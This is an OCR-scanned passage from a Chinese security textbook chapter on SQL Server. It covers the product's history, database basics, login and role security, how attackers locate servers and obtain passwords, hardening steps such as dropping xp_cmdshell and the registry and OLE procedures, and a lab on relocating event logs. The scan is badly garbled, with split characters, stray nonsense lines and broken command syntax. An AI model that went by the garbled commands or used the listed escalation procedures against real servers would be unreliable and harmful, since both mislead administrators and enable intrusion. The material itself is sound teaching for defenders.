操作 系统 的 SQL Server。1993 年 ， 将 SQL Server 移植 到 了 Windows NT 3.1 平台 上 ， 即 微 
软 SQL Server 4.2 版 本 发 布 。 在 SQL Server 4 版 本 发 行 后 ，Microsoft 公司 和 Sybase 公司 在 
SQL Server 的 开发 方面 分 道 扬 镶 ， 取 消 了 合同 ， 各 自 开 发 自己 的 SQL Server。Microsoft 公 
司 专注 于 Windows NT 平台 上 的 SQL Server 开发 , 而 Sybase 公司 则 致力 于 UNIX 平台 上 的 
SQL Server 开发 。 SQL Server 6.0 版 本 是 第 一 个 完全 由 Microsoft 公司 开发 的 版 本 。1996 年 ， 
Microsoft 公司 推出 了 SQL Server 6.5 版 本 ， 接 着 在 1998 年 又 推出 了 具有 巨大 变化 的 SQL 
Server 7.0 版 ， 这 一 版 本 在 数据 存储 和 数据 库 引擎 方面 发 生 了 根本 性 的 变化 。 又 经 过 两 年 的 
努力 开发 ，Microsoft 公司 于 2000 年 9 月 发 布 了 SQL Server 2000， 其 中 包括 企业 版 、 标 准 
版 、 开 发 版 、 个 人 版 四 个 版 本 。 从 SQL Server 7.0 到 SQL Server2000 的 变化 是 渐进 的 ， 没 
有 从 6.5 到 7.0 变化 那么 大 ,只 是 在 SQL Server 7.0 的 基础 上 进行 了 增强 。2005 年 微软 又 发 
布 了 SQL Server 2005 产品 , 该 产品 包括 企业 版 、 标 准 版 、 工 作 组 版 、 精 简 版 四 个 版 本 。2008 
年 第 三 季度 正式 上 市 的 SQL Server 2008 是 一 个 重大 的 产品 版 本 ， 相 比 SQL Server 2005 有 
了 许多 新 的 特性 和 关键 的 改进 ， 具 有 在 关键 领域 方面 的 显著 的 优势 ， 是 一 个 可 信任 的 、 高 
效 的 、 智 能 的 数据 平台 。2012 年 3 月 7 日， 微软 的 最 新 数据 库 平台 SQL Server 2012 以 线 
上 虚拟 的 方式 进行 发 布 ， 在 正式 发 布 的 SQL Server 2012 中 ， 包 括 三 个 主要 版 本 : 企业 版 、 
商务 智能 版 以 及 标准 版 。 其 中 企业 版 包含 了 全 部 的 新 功能 , 微软 官方 表示 , SQL Server 2012 
企业 版 将 适用 于 关键 应 用 、 大 型 数据 仓库 以 及 高 度 虚拟 化 的 环境 。 标 准 版 适用 于 “部 门 级 
部 署 ” 以 及 “有 限 的 商务 智能 项 目 ”， 而 最 新 的 BI 版 则 处 于 两 者 之 间 。 


3.3.3 ”数据 库 技术 的 基本 概念 


数据 库 技术 是 一 种 计算 机 辅助 管理 数据 的 方法 ， 它 研究 如 何 组 织 和 存储 数据 ， 如 何 高 
效 地 获取 和 处 理 数据 。 

数据 库 技术 产生 于 20 世纪 60 年 代 末 70 年 代 初 , 其 主要 目的 是 有 效 地 管理 和 存 取 大 量 
的 数据 资源 ， 数 据 库 技术 主要 研究 如 何 存储 、 使 用 和 管理 数据 。 

数据 库 技 术 应 用 中 ， 经 常用 到 的 基本 概念 有 : 数据 库 (DB)、 数 据 库 管理 系统 (DBMS)、 
数据 库 系统 (DBS)、 数 据 库 技术 及 数据 模型 。 


1. 数据 库 


数据 库 是 长 期 存储 在 计算 机 内 、 有 组 织 的 、 统 一 管理 的 相关 数据 的 集合 。 数 据 库 能 为 
各 种 用 户 共享 ， 具 有 较 小 见 余 度 、 数 据 间 联系 紧密 而 又 有 较 高 的 数据 独立 性 。 


2. 数据 库 管理 系统 


数据 库 管理 系统 是 位 于 用 户 与 操作 系统 (OS) 之 间 的 一 层 数 据 管理 软件 ， 它 为 用 户 或 应 
用 程序 提供 访问 数据 库 的 方法 ， 包 括 数据 库 的 建立 、 查 询 、 更 新 及 各 种 数据 控制 等 。 


3. 数据 库 系统 


数据 库 系统 是 实现 有 组 织 地 、 动 态 地 存储 大 量 关 联 数据 、 方 便 多 用 户 访问 的 计算 机 硬 
软件 和 数据 资源 组 成 的 系统 ， 即 它 是 采用 数据 库 技术 的 计算 机 系统 。 


中 1 贷 3 蓝 友 纺 必 多 与 副 谨 话 委 全 


4. 数据 库 技术 
数据 库 技术 是 研究 数据 库 的 结构 、 存 储 、 设 计 、 管 理 和 使 用 的 一 门 软件 学 科 。 
5. 数据 模型 


模型 是 对 现实 世界 的 抽象 。 在 数据 库 技术 中 ， 我 们 用 模型 的 概念 描述 数据 库 的 结构 与 
语义 ， 对 现实 世界 进行 抽象 。 

数据 模型 是 能 表示 实体 类 型 及 实体 间 联 系 的 模型 。 

数据 模型 的 种 类 很 多 ， 目 前 被 广泛 使 用 的 可 分 为 两 种 类 型 。 

一 种 是 独立 于 计算 机 系统 的 数据 模型 ， 完 全 不 涉及 信息 在 计算 机 中 的 表示 ， 只 是 用 来 
描述 某 个 特定 组 织 所 关心 的 信息 结构 ， 这 类 模型 称 为 “概念 数据 模型 ”。 概 念 模型 是 按 用 
户 的 观点 对 数据 建 模 ， 强 调 其 语义 表达 能 力 ， 概 念 应 该 简单 、 清 晰 、 易 于 用 户 理解 ， 它 是 
对 现实 世界 的 第 一 层 抽象 ， 是 用 户 和 数据 库 设 计 人 员 之 间 进 行 交流 的 工具 。 这 一 类 模型 中 
最 著名 的 是 “实体 联系 模型 ”。 

另 一 种 数据 模型 是 直接 面向 数据 库 的 逻辑 结构 ， 它 是 对 现实 世界 的 第 二 层 抽 象 。 这 类 
模型 直接 与 数据 库 管理 系统 有 关 ， 称 为 “ 罗 辑 数据 模型 ”， 一 般 又 称 为 “结构 数据 模型 ”。 
例如 层次 、 网 状 、 关 系 、 面 向 对 象 等 模型 。 这 类 模型 有 严格 的 形式 化 定义 ， 以 便于 在 计算 
机 系统 中 实现 。 它 通常 有 一 组 严格 定义 的 无 二 义 性 语法 和 语义 的 数据 库 语 言 ， 人 们 可 以 用 
这 种 语言 来 定义 、 操 纵 数 据 库 中 的 数据 。 

结构 数据 模型 应 包含 数据 结构 、 数 据 操作 和 数据 完整 性 约束 三 个 部 分 。 

(1) 数据 结构 是 指 对 实体 类 型 和 实体 间 联 系 的 表达 和 实现 。 

(2) 数据 操作 是 指 对 数据 库 的 检索 和 更 新 (包括 插入 、 删 除 和 修改 ) 两 类 操作 。 

G) 数据 完整 性 约束 给 出 数据 及 其 联系 应 具有 的 制约 和 依赖 规则 。 


3.3.4 SQL 安全 原理 


在 研究 SQL Server 攻击 和 防守 前 , 应 该 熟悉 基本 的 SQL Server 安全 原理 。 一 旦 认识 到 
哪个 安全 基础 结构 正 被 使 用 ， 就 会 更 好 地 理解 每 个 攻击 或 防守 。SQL Server 支持 三 级 安全 
层次 ， 这 种 三 层次 的 安全 结构 与 Windows 安全 结构 相似 ， 因 此 Windows 安全 知识 也 适用 
于 SQL Server。 

1. 第 一 级 安全 层次 

服务 器 登录 是 SQL Server 认证 体系 的 第 一 道 关 ， 用 户 必须 登录 到 SQL Server， 或 者 已 
经 成 功 登录 了 一 个 映射 到 SQL Server 的 系统 账号 。SQL Server 有 两 种 服务 器 验证 模式 : 
Windows 安全 模式 和 混合 模式 。 如 果 选 择 的 是 Windows 安全 模式 ， 并 把 Windows 用 户 登 
录 了 映射 到 了 SQL Server 登录 上 ， 那 么 合法 的 Windows 用 户 也 就 连 到 了 SQL Server 上 , 不 
是 Windows 合法 用 户 的 用 户 则 不 能 连接 到 SQL Server 上 。 在 混合 模式 中 ，Windows 用 户 
访问 Windows 和 SQL Server 的 方式 与 Windows 安全 模式 相同 ， 而 一 个 非法 的 Windows 用 
户 则 可 以 通过 合法 的 用 户 名 和 口令 访问 SQL Server( 当 然 ， 合 法 的 Windows 用 户 也 可 以 通 
过 其 他 合法 的 用 户 名 和 口令 ， 但 不 通过 Windows 登录 而 访问 SQL ServeD。 除 非 必须 适用 
混合 模式 ， 否 则 建议 使 用 Windows 安全 模式 。 
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为 方便 服务 器 管理 ， 每 个 SQL Server 有 多 个 内 置 的 服务 器 角色 ， 人 允许 系统 管理 员 可 信 
的 实体 授予 一 些 功能 ， 而 不 必 使 它们 成 为 完全 的 管理 员 。 服 务 器 中 的 一 些 角色 如 表 3-3 
所 示 。 


表 3-3 服务 器 角色 及 其 主要 功能 


服务 器 角色 描 述 
sysadmin 可 以 执行 SQL Server 中 的 任何 任务 
securityadmin 可 以 管理 登录 
serveradmin 可 以 设置 服务 器 选项 (sp_configure) 
setupadmin 可 以 设置 连接 服务 器 ， 运 行 sp_serveroption 
processadmin 管理 服务 器 上 的 进程 (有 能 力 取消 连接 ) 
diskadmin 可 以 管理 磁盘 文件 
dbcreator 可 以 创建 、 管 理 数据 库 
bulkadmin 可 以 执行 BULk INSERT 指令 


2. 第 二 级 安全 层次 

它 控制 用 户 与 一 个 特定 的 数据 库 的 连接 。 在 SQL Server 上 登录 成 功 并 不 意味 着 用 户 已 
经 可 以 访问 SQL Server 上 的 数据 库 ， 还 需要 数据 库 用 户 是 实际 被 数据 库 授予 权限 的 实体 。 
当 数 据 库 所 有 者 (db_owner，dbo) 创 建 了 新 的 存储 过 程 ， 它 将 为 数据 库 用 户 或 角色 的 存储 过 
程 分 配 执行 权限 ， 而 不 是 登录 。 数 据 库 用 户 从 概念 上 与 操作 系统 用 户 是 完全 无 关 的 ， 但 是 
在 实际 使 用 中 把 它们 对 应 起 来 可 能 比较 方便 ， 但 不 是 必需 的 。 

3. 第 三 级 安全 层次 

它 允 许 用 户 拥 有 对 指定 数据 库 中 一 个 对 象 的 访问 权限 ， 由 数据 库 角 色 来 定义 。 用 户 定 
义 的 角色 可 以 更 加 方便 地 为 用 户 创建 的 对 象 、 固 定 的 角色 和 合适 的 应 用 角色 分 配 权限 。 

1) 用户 定义 的 角色 

用 户 定义 的 角色 与 Windows 认证 中 的 组 类 似 。 每 个 用 户 可 以 是 一 个 或 多 个 用 户 定义 的 
数据 角色 中 的 成 员 ， 可 以 直接 应 用 于 如 表单 或 存储 过 程 等 系统 对 象 。 强 烈 建议 把 权限 分 配 
给 角色 而 不 是 用 户 ， 因 为 这 将 极 大 地 方便 分 配 权限 ， 从 而 极 少 导致 错误 。 

2) ”固定 数据 库 角 色 

固定 数据 库 角 色 人 允许 数据 库 所 有 者 (dbo) 赋 予 一 些 用 户 授权 能 力 ， 方 便 管理 ， 抑 制 一 些 
用 户 过 多 的 权限 。 强 烈 推荐 管理 员 和 数据 库 所 有 者 经 常 检查 这 些 组 的 成 员 资格 ， 确 保 没 有 
用 户 被 给 予 了 不 应 得 的 权限 。 参 考 表 3-4 中 的 数据 库 角色 ， 以 及 对 角色 主要 功能 和 权限 的 
简要 描述 。 


表 3-4 数据 库 角 色 及 其 主要 功能 


描 述 
可 以 执行 所 有 数据 库 角色 的 活动 
可 以 增加 或 删除 Windows 组 、 用 户 和 数据 库 中 的 SQL Server 用 户 


固定 数据 库 角色 
db_owner 


db accessadmin 


MED 


续 表 
固定 数据 库 角 色 描 述 
db datareader 可 以 阅读 数据 库 中 所 有 用 户 表 的 数据 
db datawriter 可 以 写 或 删除 数据 库 中 所 有 用 户 表 的 数据 
db ddladmin 可 以 增加 、 修 改 或 放弃 数据 库 的 对 象 
db_securityadmin 可 以 管理 角色 和 数据 库 角 色 的 成 员 ， 管 理 数据 库 的 参数 和 对 象 权限 
db_backupoperator 可 以 备份 数据 库 


db_denydatareader 不 能 选择 数据 库 的 数据 
db denydatawriter 不 能 改变 数据 库 的 数据 


应 用 角色 是 专门 为 下 面 的 应 用 程序 设计 的 ， 即 当 用 户 访问 SQL Server， 使 用 特别 的 应 
用 程序 时 ， 希 望 用 户 拥有 更 大 的 权限 访问 ， 而 又 不 想 授 予 单独 的 用 户 权限 ， 因 为 如 果 许 可 
某 个 用 户 访 问 SQL Server 表 , 就 不 能 控制 这 些 用 户 连接 到 SQL Server 的 方式 , 阻止 他 们 以 
自己 从 没 想 过 的 方法 访问 数据 。 因 此 ， 要 解决 这 个 问题 ， 需 要 创建 一 个 应 用 程序 角色 ， 然 
后 在 执行 需要 提高 权限 的 功能 时 ， 让 应 用 程序 切换 到 那个 角色 。 接 着 确保 当 通过 此 应 用 程 
序 时 ， 用 户 只 能 执行 期 望 的 功能 。 

通过 使 用 sp_addapprole， 首 先 创建 数据 库 角色 执行 这 个 功能 ， 如 : exec sp_addapprole 
“app_role_ name”,“strong_ password”。 应 用 程序 接着 发 布 命令 ， 切 换 安 全 环境 到 应 用 角 
色 ( 假 定 以 加 密 表单 的 形式 给 SQL Server 发 送 密码 ): exec sp_addapprole “app_role name”， 
{Encrypt N “strong password” }, “odbc” 。 

为 了 记录 ， 这 个 特性 只 应 考虑 在 小 应 用 程序 中 作为 最 后 的 手段 。 比 如 ， 如 果 只 希望 用 
户 做 一 些 他 们 一 般 不 能 在 应 用 程序 中 做 的 事情 , 知道 创建 不 需要 数据 访问 的 存储 过 程 即 可 。 
如 果 存储 过 程 由 一 个 用 户 所 有 (经 常设 定 为 dbo), 并 没有 合适 的 权限 级 别 , 不 包含 任何 exec 
参数 ， 则 用 户 将 可 以 执行 存储 过 程 来 访问 需要 的 功能 。 这 是 更 可 控 的 方法 ， 不 需要 证 书 
编码 。 


3.4 SQL Server 攻击 的 防护 


微软 的 SQL Server 是 一 种 广泛 使 用 的 数据 库 ， 很 多 电子 商务 网 站 、 企 业内 部 信息 化 平 
台 等 都 是 基于 SQL Server 的 , 但 是 数据 库 的 安全 性 还 没有 被 人 们 和 系统 的 安全 性 等 同 起 来 ， 
多 数 管理 员 认 为 只 要 把 网 络 和 操作 系统 的 安全 做 好 了 ， 那 么 所 有 的 应 用 程序 也 就 安全 了 。 
大 多 数 系统 管理 员 对 数据 库 不 熟悉 ， 而 数据 库 管理 员 又 对 安全 问题 关心 太 少 ， 而 且 一 些 安 
全 公司 也 忽略 数据 库 安全 ， 这 就 使 数据 库 的 安全 问题 更 加 严峻 了 。 数 据 库 系统 中 存在 的 安 
全 漏洞 和 不 当 的 配置 通常 会 造成 严重 的 后 果 ， 而 且 都 难以 发 现 。 数 据 库 应 用 程序 通常 同 操 
作 系 统 的 最 高 管理 员 密切 相关 。 广 泛 的 SQL Server 数据 库 又 是 属于 “端口 ”型 的 数据 库 ， 
这 就 表示 任何 人 都 能 够 用 分 析 工 具 试 图 连接 到 数据 库 上 ， 从 而 绕 过 操作 系统 的 安全 机 制 ， 
进而 闻 入 系统 、 破 坏 和 窃取 数据 资料 ， 甚 至 破坏 整个 系统 。 
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3.4.1 “信息 资源 的 收集 


在 讨论 如 何 防范 攻击 者 之 前 ， 必 须要 了 解 攻 击 者 如 何 查找 和 渗透 SQL Server 或 基于 
SQL Server 的 应 用 程序 。 

攻击 者 可 能 有 许多 原因 来 选择 潜在 的 目标 ， 包 括 报复 、 利 益 或 恶意 。 永 远 不 要 假定 自 
己 的 服务 器 “ 飞 ” 得 太 低 ， 以 至 于 不 能 显示 在 别人 的 雷达 屏幕 上 。 许 多 攻击 者 只 是 因为 高 
兴 而 扫描 他 范围， 假定 自 己 的 ISP 或 内 部 网 路 被 这 些 人 骚扰 了 ， 那 就 要 做 最 坏 的 打算 。 

现在 评估 SQL Server 被 发 现 的 方法 ， 可 以 通过 网 络 ， 也 可 以 通过 企业 内 部 。 攻 击 者 无 
论 是 把 某 些 人 P 范围 作为 目标 ， 还 是 随机 扫描 ， 他 们 发 现 SQL Server 所 使 用 的 工具 都 是 一 
样 的 。 

当 微 软 在 SQL Server 中 引入 多 请 求 能 力 时 , 就 引入 了 一 个 难题 : 既然 端口 (除了 默认 的 
请 求 , 它 默认 监听 端口 1433) 是 动态 分 配 的 , 那么 怎样 知道 请 求 名 字 的 用 户 是 如 何 连接 到 合 
适 的 TCP 端口 的 ? 微软 通过 在 UDP1434 上 创建 一 个 监听 者 来 解决 这 个 问题 ， 该 方法 被 称 
为 SQL Server 解决 服务 方案 。 这 个 服务 方案 负责 发 送 包 含 链 接 信 息 的 响应 包 给 发 送 特定 请 
求 的 客户 。 这 个 包含 有 人 允许 客户 想得到 的 请 求 的 所 有 信息 ， 包 括 每 个 请 求 的 TCP 端口 、 请 
求 形式 ， 以 及 服务 器 是 否 集群 等 。 


3.4.2 ”获取 账号 及 扩大 权限 


假定 SQL Server 搜索 是 成 功 的， 那么 现在 有 收集 到 的 瑟 地 址 、 请 求 名 称 以 及 TCP 端 
口 作为 武装 ， 然 后 去 获得 一 些 安全 环境 的 信息 。 可 收集 关于 服务 器 的 信息 ， 比 如 版 本 信息 、 
数据 库 、 表 单 以 及 其 他 的 信息 ， 这 些 将 决定 谁 是 目标 : 是 SQL Server 数据 还 是 操作 系统 。 

一 般 来 说 ， 入 侵 者 可 以 通过 以 下 几 个 手段 来 获取 账号 或 密码 。 

(1) 社会 ( 交 ) 工 程 学 : 通过 欺诈 手段 或 关系 获取 密码 。 

(2) 弱 口 令 扫描 : 该 方法 是 最 简单 的 方法 ， 入 侵 者 通过 扫描 大 量 主机 ， 从 中 找 出 一 两 
个 存在 弱 口令 的 主机 。 

(3) 探测 包 进行 密码 监听 ， 可 以 通过 Sniffer( 嗅 探 器 ) 来 监听 网 络 中 的 数据 包 ， 从 而 
获得 密码 。 它 对 付 明文 密码 特别 有 效 ， 如 果 获取 的 数据 包 是 加 密 的 ， 还 要 涉及 解密 算法 。 

(4) 暴力 破解 SQL 口令 : 密码 终结 者 ， 获 取 密 码 只 是 时 间 问 题 ， 例 如 本 地 暴力 破解 、 
远程 暴力 破解 。 

(5) 其 他 方法 : 例如 在 入 侵 后 安装 木马 或 安装 键盘 记录 程序 等 。 


3.4.3 设置 安全 的 SQL Server 


首先 用 户 必 须 对 操作 系统 进行 安全 配置 ， 保 证 操作 系统 处 于 安全 状态 。 然 后 对 用 户 要 
使 用 的 操作 数据 库 软 件 (程序 ) 进 行 必要 的 安全 审核 ， 比 如 对 ASP、PHP 等 脚本 的 审核 ， 这 
是 很 多 基于 数据 库 的 Web 应 用 常 出 现 的 安全 隐患 ， 对 于 脚本 主要 是 一 个 过 滤 问题 ， 需 要 过 
滤 一 些 类 似 ,“ ; @/ 等 字符 ， 防 止 破坏 者 构造 恶意 的 SQL 语句 。 


中 入 多 章 大 纺 饥 务 与 二 多 库 安 全 


1. 使 用 安全 的 密码 策略 


我 们 把 密码 策略 摆 在 所 有 安全 配置 的 第 一 步 ， 请 注意 ， 很 多 数据 库 账 号 的 密码 过 于 简 
单 ， 这 跟 系 统 密码 过 于 简单 是 一 个 道理 。 对 于 sa 更 应 该 注意 ， 同 时 不 要 让 sa 账号 的 密码 
写 于 应 用 程序 或 者 脚本 中 。 健 壮 的 密码 是 安全 的 第 一 步 ! SQL Server 安装 的 时 候 ， 如 果 是 
使 用 混合 模式 ， 那 么 就 需要 输入 sa 的 密码 ， 除 非 你 确认 必须 使 用 空 密码 。 这 比 以 前 的 版 本 
有 所 改进 。 同 时 养 成 定期 修改 密码 的 好 习惯 。 数 据 库 管 理 员 应 该 定期 查看 是 否 有 不 符合 密 
码 要 求 的 账号 。 

比如 使 用 下 面 的 SQL 语句 : 


Use master 


Select name,Password from syslogins where password is null 


2. 使 用 安全 的 账号 策略 


由 于 SQL Server 不 能 更 改 sa 用 户 名 称 ,也 不 能 删除 这 个 超级 用 户 ， 所 以 ,我 们 必须 对 
这 个 账号 进行 最 强 的 保护 。 当 然 ， 包 括 使 用 一 个 非常 强壮 的 密码 ， 最 好 不 要 在 数据 库 应 用 
中 使 用 sa 账号， 只 有 当 没有 其 他 方法 登录 到 SQL Server 实例 (例如 ， 当 其 他 系统 管理 员 不 
可 用 或 忘记 了 密码 ) 时 才 使 用 sa。 建 议 数据 库 管理 员 新 建立 个 拥有 与 sa 一 样 权限 的 超级 用 
户 来 管理 数据 库 。 安 全 的 账号 策略 还 包括 不 要 让 管理 员 权限 的 账号 泛滥 。 

SQL Server 的 认证 模式 有 Windows 身份 认证 和 混合 身份 认证 两 种 。 如果 数 据 库 管理 员 
不 希望 操作 系统 管理 员 通过 操作 系统 登录 来 接触 数据 库 的 话 ， 可 以 在 账号 管理 中 把 系统 账 
号 “BUILTINAdministrators” 删除 。 不 过 这 样 做 的 结果 是 一 旦 sa 账号 忘记 密码 的 话 ， 就 没 
有 办 法 来 恢复 了 。 很 多 主机 使 用 数据 库 应 用 只 是 用 来 做 查询 、 修 改 等 简单 功能 的 ， 请 根据 
实际 需要 分 配 账号 ， 并 赋予 仅仅 能 够 满足 应 用 要 求 和 需要 的 权限 。 比 如 ， 只 要 查询 功能 的 ， 
那么 就 使 用 一 个 简单 的 public 账号 能 够 select 就 可 以 了 。 

3. 加 强 数据 库 日 志 的 记录 

审核 数据 库 登录 事件 的 “失败 和 成 功 ”， 在 实例 属性 中 选择 “安全 性 ”， 将 其 中 的 审 
核 级 别 选 定 为 全 部 ， 这 样 在 数据 库 系统 和 操作 系统 日 志 里 面 ， 就 详细 记录 了 所 有 账号 的 全 
录 事件 。 请 定期 查看 SQL Server 日 志 检查 是 否 有 可 疑 的 登录 事件 发 生 ， 或 者 使 用 DOS 
命令 。 


findstr /C:" 登 录 " d:\Microsoft SQL Server\MSSQL\LOG\*.* 


4. 管理 扩展 存储 过 程 


对 存储 过 程 进行 大 手术 ， 并 且 对 账号 调用 扩展 存储 过 程 的 权限 要 慎重 。 其 实在 多 数 应 
用 中 根本 用 不 到 多 少 系统 的 存储 过 程 ， 而 SQL Server 的 这 么 多 系统 存储 过 程 只 是 用 来 适应 
广大 用 户 需求 的 ， 所 以 请 删除 不 必要 的 存储 过 程 ， 因 为 有 些 系统 的 存储 过 程 能 很 容易 地 被 
人 利用 起 来 提升 权限 或 进行 破坏 。 如 果 用 户 不 需要 扩展 存储 过 程 xp_cmdshell 请 把 它 去 掉 ， 
请 使 用 以 下 SQL 语句 : 
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use master 


sp_dropextendedproc "xp cmdshell' 


xp_cmdshell 是 进入 操作 系统 的 最 佳 捷径 ， 是 数据 库 留 给 操作 系统 的 一 个 大 后 门 。 如 果 
用 户 需要 这 个 存储 过 程 ， 请 用 这 个 语句 将 其 恢复 过 来 。 


sp _ addextendedproc 'xp cmdshell', 'xpsql70.d11" 


如 果 用 户 不 需要 ， 请 丢弃 OLE 自动 存储 过 程 (会 造成 管理 器 中 的 某 些 特 征 不 能 使 用 )， 
这 些 过 程 包括 : 


Sp_OACreate Sp OADestroy Sp_OAGetErrorInfo Sp _ ORGetProperty 

Sp_OAMethod Sp_ OASetProperty Sp_OAStop 

去 掉 不 需要 的 注册 表 访 问 的 存储 过 程 ， 注 册 表 存储 过 程 甚 至 能 够 读 出 操作 系统 管理 员 
的 密码 来 ， 如 下 : 


Xp_regaddmultistring Xp regdeletekey Xp _regdeletevalue 

Xp regenumvalues Xp regread Xp regremovemultistring 

Xp_regwrite 

还 有 一 些 其 他 的 扩展 存储 过 程 ， 也 最 好 检查 检查 。 在 处 理 存储 过 程 的 时 候 ， 请 确认 一 
避免 造成 对 数据 库 或 应 用 程序 的 伤害 。 


5. 使 用 协议 加 密 


SQL Server 使 用 的 Tabular Data Stream 协议 来 进行 网 络 数据 交换 ， 如 果 不 加 密 的 话 ， 
所 有 的 网 络 传输 都 是 明文 的 ， 包 括 密码 、 数 据 库 内 容 等 ， 这 是 一 个 很 大 的 安全 威胁 。 能 被 
人 在 网 络 中 截获 到 他 们 需要 的 东西 ， 包 括 数据 库 账 号 和 密码 。 所 以 ,在 条 件 允 许 的 情况 下 ， 
最 好 使 用 SSL 来 加 密 协 议 ， 当 然 ， 用 户 还 需要 一 个 证 书 来 支持 。 

6. 不 要 让 人 随便 探测 到 你 的 TCP/IP 端口 

默认 情况 下 ，SQL Server 使 用 1433 端口 监听 ， 很 多 人 都 说 SQL Server 配置 的 时 候 要 
把 这 个 端口 改变 ， 这 样 别人 就 不 能 很 容易 地 知道 使 用 的 什么 端口 了 。 可 惜 ， 通 过 微软 未 公 
开 的 1434 端口 的 UDP 探测 ， 可 以 很 容易 知道 SQL Server 使 用 的 什么 TCP/IP 端口 。 不 过 
微软 还 是 考虑 到 了 这 个 问题 ， 毕 竟 公 开 而 且 开放 的 端口 会 引起 不 必要 的 麻烦 。 在 实例 属性 
中 选择 TCP/IP 协议 的 属性 ， 选 择 隐 藏 SQL Server 实例 。 如 果 隐 藏 了 SQL Server 实例 ， 
则 将 禁止 对 试图 枚 举 网 络 上 现 有 的 SQL Server 实例 的 客户 端 所 发 出 的 广播 做 出 响应 。 这 
样 ， 别 人 就 不 能 用 1434 来 探测 用 户 的 TCP/IP 端口 了 (除非 用 Port Scan)。 


7. 修改 TCP/P 使 用 的 端口 


请 在 上 一 步 配置 的 基础 上 , 更 改 原 默认 的 1433 端口 。 在 实例 属性 中 选择 网 络 配置 中 的 
TCP/P 协议 的 属性 ， 将 TCP/IP 使 用 的 默认 端口 变 为 其 他 端口 。 


8. 拒绝 来 自 1434 端口 的 探测 
由 于 1434 端口 探测 没有 限制 ， 能 够 被 别人 探测 到 一 些 数据 库 信 息 ， 而 且 还 可 能 遭 到 


了 


中 由 萝 了 章 ， 因 纺 希 务 与 二 府 库 安 全 


Dos 攻击 让 数据 库 服务 器 的 CPU 负荷 增 大 , 所 以 对 Windows server 操作 系统 来 说 , 在 PSec 
过 滤 拒 绝 掉 1434 端口 的 UDP 通信 ， 可 以 尽 可 能 地 隐藏 用 户 的 SQL Server。 


9. 对 网 络 连接 进行 IP 限制 


SQL Server 数据 库 系 统 本 身 没 有 提供 网 络 连 接 的 安全 解决 办 法 ， 但 是 Windows Server 
操作 系统 提供 了 这 样 的 安全 机 制 :使 用 操作 系统 自己 的 IPSec 可 以 实现 他 数据 包 的 安全 性 。 
对 人 P 连接 进行 限制 ， 只 保证 自己 的 他 能够 访问 ， 也 拒绝 其 他 了 P 进行 的 端口 连接 ， 把 来 自 
网 络 上 的 安全 威胁 进行 有 效 的 控制 。 


小 结 


本 章 主要 介绍 了 拒绝 服务 攻击 的 概念 及 原理 ， 常 见 的 DoS 攻击 种 类 及 防护 ， 基 于 漏洞 
入 侵 的 防护 方法 ，SQL 数据 库 安全 原理 及 SQL Server 攻击 的 防护 等 内 容 , 简单 介 绍 了 基于 
电子 邮件 服务 与 Telnet 攻击 的 防护 方法 、SQL 服务 器 的 发 展 、 信 息 资源 的 收集 等 知识 ， 最 
后 介绍 了 设置 安全 的 SQL Server 的 相关 知识 。 通 过 本 章 的 学 习 ， 让 学 生 掌 握 拒 绝 服 务 攻击 
的 防范 方法 ， 基 于 漏洞 入 侵 的 防护 方法 ， 以 及 SQL 数据 库 安全 设置 。 


本 章 实 训 
实 训 一 “系统 日 志 的 防护 


1. 实 训 目 的 


掌握 系统 注册 表 基 本 维护 。 
掌握 日 志清 除 的 防范 方法 。 


2. 实 训 要 求 
计算 机 一 台 ， 要 求 安装 Windows 2003 操作 系统 。 
3. 实 训 步骤 


(1) 首先 找 出 日 志文 件 默认 位 置 ， 以 管理 员 身 份 登录 系统 ， 选 择 “ 开 始 ” 一 “和 运行” 
命令 ， 在 弹出 的 系统 运行 对 话 框 中 ， 输 入 字符 串 命 令 compmgmt.msc， 单 击 “确定 ”按钮 
后 打开 服务 器 系统 的 “计算 机 管理 ”窗口 ， 如 图 3-9 所 示 。 

(2) 其 次 在 该 管理 窗口 的 左 侧 显示 窗 格 中 ， 用 鼠标 逐一 展开 “系统 工具 ”一 “事件 查 
看 器 ”分 支 项 目 ， 在 “事件 查看 器 ”分 支 项 目下 面 我 们 会 看 到 “系统 ”、“ 安 全 性 ”以 及 
“应 用 程序 ”三 个 选项 。 要 查看 系统 日 志文 件 的 默认 存放 位 置 时 ， 右 击 “ 事 件 查看 器 ”分 
支 项 目下 面 的 “应 用 程序 ”选项 ， 从 弹出 的 快捷 菜单 中 选择 “属性 ”命令 。 在 该 窗口 的 常 
规 标签 页 面 中 ， 我 们 可 以 看 到 本 地 日 志文 件 的 默认 存放 位 置 为 “C:WINDOWS\system32\ 
config\AppEventEvt”， 如 图 3-10 所 示 。 
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3-9 “计算 机 管理 ”窗口 


应 用 程序 属性 


(VTiDors\sys tema\confi AppEvent Eve 
258.0 名 C82 144 手 胡 ) 

006 年 1 月 7 日 星 其 二 1:16:00 
004 年 4 月 加 日 星 央 一 11:59:40 
2004 年 4 月 各 日 星 其 一 0:00:00 


图 3-10 “应 用 程序 属性 ”对 话 框 


(3) 做 好 日 志文 件 挪移 准备 ， 为 了 让 服务 器 的 日 志文 件 不 被 外 人 随意 访问 ， 我 们 必须 
让 日 志文 件 挪移 到 一 个 其 他 人 根本 无 法 找到 的 地 方 ， 例 如 可 以 到 EE 分 区 的 一 个 “E:\aaa\” 
目录 下 面 创建 一 个 “bbb” 目 录 。 

(4) 正式 挪移 日 志文 件 ， 将 对 应 的 日 志文 件 从 原始 位 置 直接 复制 到 新 目录 位 置 
“E:\aaa\bbb\” 下。 

(5) 修改 系统 注册 表 做 好 服务 器 系统 与 日 志文 件 的 关联 ， 选 择 “ 开 始 ” 一 “运行 ” 命 
令 ， 在 弹出 的 “运行 ”对 话 框 中 ， 输 入 注册 表 编 辑 命令 regedit， 按 Enter 键 后 ， 打 开 系 统 
的 注册 表 编 辑 窗口 ， 用 鼠标 双击 “HKEY_LOCAL _MACHINE” 注 册 表 子 键 ， 在 随后 展开 
的 注册 表 分 支 下面 一 次 选择 “SYSTEM”、“CurrentControlSet” 、“Service”、“Eventlog” 
项 目 ， 在 对 应 “Eventlog” 项 目下 面 我 们 会 看 到 “System”、“Security”、“Application” 
三 个 选项 ， 如 图 3-11 所 示 。 
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(6) 在 对 应 “System” 注 册 表 项 目的 右 侧 显 示 区 域 中 ， 用 鼠标 双击 “File” 键 值 ， 弹 出 
如 图 3-12 所 示 的 数值 设置 对 话 框 ， 然 后 在 “数值 数据 ”文本 框 中 ， 输 入 
“E:aaa\bbb\SysEventEvt” 字 符 串 内 容 ， 也 就 是 输入 系统 日 志文 件 新 的 路 径 信息 ， 最 后 单 
